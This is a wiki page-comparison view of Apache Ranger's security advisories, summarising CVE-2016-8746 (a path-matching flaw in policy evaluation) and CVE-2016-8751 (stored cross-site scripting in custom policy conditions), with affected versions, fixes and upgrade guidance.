Versions Compared

Old Version 8

changes.mady.by.user Velmurugan Periasamy

Saved on

compared with

New Version 9

changes.mady.by.user Velmurugan Periasamy

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.
Note

Before reporting any security related JIRAs, please go through Apache's guidance for VULNERABILITY HANDLING

Fixed in Ranger 0.6.3

...

CVE-2016-8746: Apache Ranger path matching issue in policy evaluation

Severity: Normal

Vendor: The Apache Software Foundation

Versions Affected: 0.6.0/0.6.1/0.6.2 versions of Apache Ranger

Users affected: All users of ranger policy admin tool

Description: Ranger policy engine incorrectly matches paths in certain conditions when policy does not contain wildcards and has recursion flag set to true.

Fix detail: Fixed policy evaluation logic.

Mitigation: Users should upgrade to 0.6.3 or later version of Apache Ranger with the fix.

...

CVE-2016-8751: Apache Ranger stored cross site scripting issue

Severity: Normal

Vendor: The Apache Software Foundation

Versions Affected: 0.5.x and 0.6.0/0.6.1/0.6.2 versions of Apache Ranger

Users affected: All users of ranger policy admin tool

Description: Apache Ranger was found to be vulnerable to a Stored Cross-Site Scripting in when entering custom policy conditions. Admin users can store some arbitrary javascript code to be executed when normal users login and access policies.

Fix detail: Added logic to sanitize the user input.

Mitigation: Users should upgrade to 0.6.3 or later version of Apache Ranger with the fix.

Fixed in Ranger 0.6.2

...

CVE-2016-6815: Apache Ranger user privilege vulnerability

...